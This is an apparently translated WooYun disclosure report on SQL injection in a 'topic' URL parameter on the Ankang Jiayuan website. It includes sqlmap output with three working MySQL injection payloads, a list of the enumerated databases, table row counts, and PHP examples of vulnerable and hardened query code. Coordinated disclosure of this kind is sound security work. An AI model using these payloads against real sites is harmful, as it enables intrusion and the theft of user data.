
Vulnerability summary (24 following)

Defect ID: wooyun-2016-0166994

Title: SQL injection at one location on Ankang Jiayuan (安康家园) leads to a site-wide data leak

Vendor: Ankang Jiayuan (安康家园)

Author: 花式

Submitted: 2016-01-05 01:10

Fixed: 2016-02-20 15:48

Published: 2016-02-20 15:48

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Handed over to a third-party partner organization (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or assistance contact [email protected]



Vulnerability details

Disclosure status:

2016-01-05: Details sent to the vendor; awaiting vendor handling
2016-01-08: Vendor confirmed; details visible to the vendor only
2016-01-18: Details disclosed to core white hats and domain experts
2016-01-28: Details disclosed to regular white hats
2016-02-07: Details disclosed to intern white hats
2016-02-20: Details disclosed to the public

Brief description:

As per the title.

Detailed description:

http://**.**.**.**/index/list?topic=0&sortid=13


sqlmap resumed the following injection point(s) from stored session:
---
Parameter: topic (GET)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: topic=0 RLIKE (SELECT (CASE WHEN (3524=3524) THEN 0 ELSE 0x28 END))&sortid=13
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: topic=0 AND (SELECT 4243 FROM(SELECT COUNT(*),CONCAT(0x716a6a6271,(SELECT (ELT(4243=4243,1))),0x7176627a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&sortid=13
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: topic=0 AND (SELECT * FROM (SELECT(SLEEP(5)))GWIX)&sortid=13
---
[12:52:16] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.4.12, PHP 5.4.13, Nginx
back-end DBMS: MySQL 5.0
[12:52:16] [INFO] fetching database names
[12:52:16] [INFO] the SQL query used returns 12 entries
[12:52:16] [INFO] resumed: information_schema
[12:52:16] [INFO] resumed: ankang_bbs
[12:52:16] [INFO] resumed: ankang_cms
[12:52:16] [INFO] resumed: ankang_ucent
[12:52:16] [INFO] resumed: app_jbw
[12:52:16] [INFO] resumed: kim_appadmin
[12:52:16] [INFO] resumed: kim_appcms
[12:52:16] [INFO] resumed: mysql
[12:52:16] [INFO] resumed: openfire
[12:52:16] [INFO] resumed: performance_schema
[12:52:16] [INFO] resumed: platform
[12:52:16] [INFO] resumed: test
available databases [12]:
[*] ankang_bbs
[*] ankang_cms
[*] ankang_ucent
[*] app_jbw
[*] information_schema
[*] kim_appadmin
[*] kim_appcms
[*] mysql
[*] openfire
[*] performance_schema
[*] platform
[*] test
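The injection point above is a numeric GET parameter (`topic`) that a PHP application splices into a MySQL query. The following is an added example, not code from the reported site, showing that pattern beside a hardened handler for the same `index/list?topic=..&sortid=..` request; the table and column names, the database account and the `DB_PASSWORD` variable are assumptions.

```php
<?php
// Added example, not the reported site's code. Table/column names (list_item,
// topic_id, sort_id), the DB account and DB_PASSWORD are assumptions.

// The pattern behind the injection point above: raw query-string values become
// SQL text, so "topic=0 AND SLEEP(5)" is executed by MySQL as written.
function listItemsVulnerable(mysqli $db, array $get)
{
    $sql = "SELECT id, title FROM list_item WHERE topic_id = {$get['topic']} "
         . "AND sort_id = {$get['sortid']} ORDER BY id DESC";
    return $db->query($sql);
}

// Hardened handler: validate the type first, then bind the values as
// parameters so they can only ever be treated as integers, never as SQL.
function listItemsSafe(PDO $db, array $get): array
{
    $opts   = ['options' => ['min_range' => 0]];
    $topic  = filter_var($get['topic']  ?? null, FILTER_VALIDATE_INT, $opts);
    $sortid = filter_var($get['sortid'] ?? null, FILTER_VALIDATE_INT, $opts);
    if ($topic === false || $sortid === false) {
        http_response_code(400);   // anything that is not a plain integer is rejected
        return [];
    }
    $stmt = $db->prepare(
        'SELECT id, title FROM list_item WHERE topic_id = :topic AND sort_id = :sortid ORDER BY id DESC'
    );
    $stmt->bindValue(':topic',  $topic,  PDO::PARAM_INT);
    $stmt->bindValue(':sortid', $sortid, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Connection: native prepares so MySQL does the binding; errors raised as
// exceptions and logged server-side so DB error text never reaches the response
// (the error-based technique above depends on it); a read-only account scoped to
// one schema (the dump above shows the app account could list all 12 databases).
$db = new PDO('mysql:host=127.0.0.1;dbname=ankang_cms;charset=utf8mb4',
              'app_readonly', getenv('DB_PASSWORD'), [
    PDO::ATTR_EMULATE_PREPARES => false,
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
]);
try {
    $rows = listItemsSafe($db, $_GET);
} catch (PDOException $e) {
    error_log($e->getMessage());   // log, do not echo
    http_response_code(500);
    $rows = [];
}
```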

Proof of vulnerability:

Database: test
+-----------------------------+---------+
| Table | Entries |
+-----------------------------+---------+
| pro_security_student_signin | 600086 |
| pro_security_define | 38408 |
| pro_security_class_signin | 30197 |
| task_log | 21320 |
| pro_security_laws | 14378 |
| pro_security_class_check | 12642 |
| food_col | 6583 |
| pro_security_roles | 5079 |
| pro_security_student | 4105 |
| actionlog | 4095 |
| china | 3331 |
| pro_security_ohs | 3219 |
| user_bs | 2835 |
| pro_security_role_user | 1117 |
| food_main | 849 |
| pro_security_user | 691 |
| app_organization | 531 |
| app_tokens | 368 |
| app_db_config | 354 |
| app_setup_log | 344 |
| app_repos | 309 |
| task | 299 |
| deploy_rj | 182 |
| pro_security_accidentevent | 145 |
| user_limit | 65 |
| pro_security_define_type | 30 |
| message | 26 |
| `user` | 17 |
| app_info | 17 |
| app_infos | 15 |
| app_match_rules | 15 |
| expired_rules | 15 |
| customer_appid | 13 |
| product_cate | 6 |
| cloud_token | 3 |
| customer | 3 |
| admin | 2 |
| config | 2 |
| product | 2 |
| product_versions | 2 |
| app_info_field | 1 |
| bug66124 | 1 |
| roles | 1 |
| site | 1 |
| user_old | 1 |
+-----------------------------+---------+


Database: kim_appadmin
+-----------------+---------+
| Table | Entries |
+-----------------+---------+
| sign | 358942 |
| log | 37669 |
| message | 13827 |
| dietarytmp | 11667 |
| messagelist | 9545 |
| `user` | 5185 |
| userinfo | 5185 |
| role | 4603 |
| sms | 524 |
| class | 523 |
| area | 432 |
| weather | 207 |
| school | 174 |
| messageconfirm | 111 |
| push_rel | 30 |
| remindlist | 13 |
| finance | 6 |
| addressbooktype | 2 |
| feedback | 1 |
+-----------------+---------+

Fix recommendation:

Copyright notice: when reproducing, please credit the source 花式@WooYun


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed: 2016-01-08 20:06

Vendor reply:

CNVD has confirmed the described situation and has forwarded it via CNCERT to the Beijing branch center, which will coordinate handling with the website's operating organization.

Latest status:

None yet